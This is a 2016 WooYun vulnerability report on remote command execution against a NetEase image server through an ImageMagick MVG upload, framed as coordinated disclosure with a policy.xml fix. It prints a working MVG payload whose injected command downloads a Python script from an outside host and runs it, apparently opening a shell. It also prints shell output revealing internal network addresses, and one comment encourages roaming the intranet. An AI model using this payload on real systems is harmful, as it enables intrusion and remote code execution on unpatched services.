网易某图片服务器命令执行(已入内网)

编号205692
Urlhttp://www.wooyun.org/bug.php?action=view&id=205692
漏洞状态厂商已经确认
漏洞标题网易某图片服务器命令执行(已入内网)
漏洞类型文件上传导致任意代码执行
厂商网易
白帽子jianFen
提交日期2016-05-06 16:04:00
公开日期2016-06-23 16:00:00
修复时间(not set)
确认时间2016-05-09 00:00:00
Confirm Spend3
漏洞标签文件上传内容未检查
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank10
漏洞简介
老套路
漏洞细节

http://bbs.163.com/user
注册后修改个人资料上传图像
上传图片内容

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|wget 115.2***02/back.py -O /tmp/x.py && python /tmp/x.py 1***2 2333")'
pop graphic-context


sh-4.0# uname -a
uname -a
Linux t-datanode-0 2.6.30-1-686 #1 SMP Mon Aug 3 16:18:30 UTC 2009 i686 GNU/Linux
sh-4.0# ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:11:43:e0:26:f0
inet addr:220.181.29.230 Bcast:220.181.29.255 Mask:255.255.255.0
inet6 addr: fe80::211:43ff:fee0:26f0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2562477857 errors:107 dropped:0 overruns:0 frame:54
TX packets:37642479 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4144008110 (3.8 GiB) TX bytes:4002831724 (3.7 GiB)
eth1 Link encap:Ethernet HWaddr 00:11:43:e0:26:f1
inet addr:192.168.51.230 Bcast:192.168.51.255 Mask:255.255.255.0
inet6 addr: fe80::211:43ff:fee0:26f1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:653650493 errors:221 dropped:0 overruns:0 frame:111
TX packets:464030411 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2474372533 (2.3 GiB) TX bytes:3341586467 (3.1 GiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:1683512 errors:0 dropped:0 overruns:0 frame:0
TX packets:1683512 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:127026347 (121.1 MiB) TX bytes:127026347 (121.1 MiB)

POC

sh-4.0# ping 10.100.21.249
ping 10.100.21.249
PING 10.100.21.249 (10.100.21.249) 56(84) bytes of data.
64 bytes from 10.100.21.249: icmp_seq=1 ttl=253 time=0.810 ms
64 bytes from 10.100.21.249: icmp_seq=2 ttl=253 time=0.755 ms
64 bytes from 10.100.21.249: icmp_seq=3 ttl=253 time=0.827 ms
64 bytes from 10.100.21.249: icmp_seq=4 ttl=253 time=0.785 ms
64 bytes from 10.100.21.249: icmp_seq=5 ttl=253 time=0.838 ms

修复方案

官方在6.9.3-9版本中对漏洞进行了不完全的修复
使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作:
<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>

状态信息 2016-05-06: 细节已通知厂商并且等待厂商处理中
2016-05-09: 厂商已经确认,细节仅向厂商公开
2016-05-19: 细节向核心白帽子及相关领域专家公开
2016-05-29: 细节向普通白帽子公开
2016-06-08: 细节向实习白帽子公开
2016-06-23: 细节向公众公开
厂商回复漏洞已修复,感谢您对网易的关注!
回应信息危害等级:高漏洞Rank:10 确认时间:2016-05-09 16:00
Showing 1-3 of 3 items.
评论内容评论人点赞数评论时间

很有可能重复了……

Yuku02016-05-06 19:09:00

@scanf - -

jianFen02016-05-06 17:12:00

都不内网逛逛

scanf02016-05-06 16:13:00